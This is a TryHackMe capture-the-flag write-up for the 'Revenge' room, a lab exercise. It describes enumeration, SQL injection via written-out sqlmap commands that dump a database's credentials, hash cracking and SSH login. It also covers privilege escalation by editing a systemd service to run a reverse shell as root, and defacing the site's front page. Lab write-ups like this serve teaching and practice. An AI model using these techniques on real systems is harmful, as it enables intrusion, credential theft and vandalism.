TryHackMe write-up: Revenge

 

Introduction

This is my write-up for TryHackMe's Revenge Room.  As can be seen in the note, this room is actually a continuation of another room Blog.  The write-up for that is found in TryHackMe write-up: Blog

After hacking Billy's website, he tracks us down and sends us the following note.

Enumeration

Using nmap, I saw that this box has 2 ports open.

Checking port 80, we see that it is hosting the company's website:

I wanted to check the products page so I checked the first product they were selling.

Funny though is that the product id is listed as part of the URL.  In this case, it is http://10.10.151.163/products/1.  I then checked what would happen if I typed in a non-existent product id, say 999: 

Exploitation

The website seems to be vulnerable to SQL injection.  To test that, I ran sqlmap using the following command:

sqlmap --current-db -u http://10.10.151.163/products/1

This is what I got after a while:

So I found that the database is named duckyinc.

I then ran sqlmap again.  This time, I wanted to dump all the data for duckyinc DB.  I then ran the following command:

sqlmap -D duckyinc --dump -u http://10.10.151.163/products/1

Here, I find a table named system_user.  This contained usernames, email addresses and password hashes.

Scrolling further down the sqlmap results, I saw another table named user.  Looking closer, I saw that there's a flag under the credit_card column.

I then copied the hashes from both the system_user and user tables and had john try to crack them.  After a while, it was able to crack one of the hashes.  I then tried to login to SSH using that password.

Once I logged in, I was able to get the 2nd flag.

Privilege Escalation

Running sudo -l, I found that I could run systemctl and sudoedit commands as root.

However, it turns out that I could only run, restart and edit a single service.  

Using sudoedit, I found that I could edit /etc/systemd/system/duckyinc.service.  Below is what the .service file looked like after editing.

I changed the user to root to make sure that the service ran as root.  I also added the ExecStartPre line.  This line creates a reverse shell back to my attacker machine before the gunicorn process is run.

Given that I changed the service's configuration, I had to restart it.  I ran the following commands for this:

Once the service was restarted, I found a connection to my netcat listener.  However, I just couldn't find the 3rd flag.  Looking back at the note and the hint provided in the room, it turns out that I had to deface the website's front page first.  To do so, I simply modified the file index.html found in /var/www/duckyinc/templates.  The defaced front page is shown below:

Notice that I only made a slight change to the index.html.  And yet, when I restarted the service and checked reverse shell, I found the 3rd flag.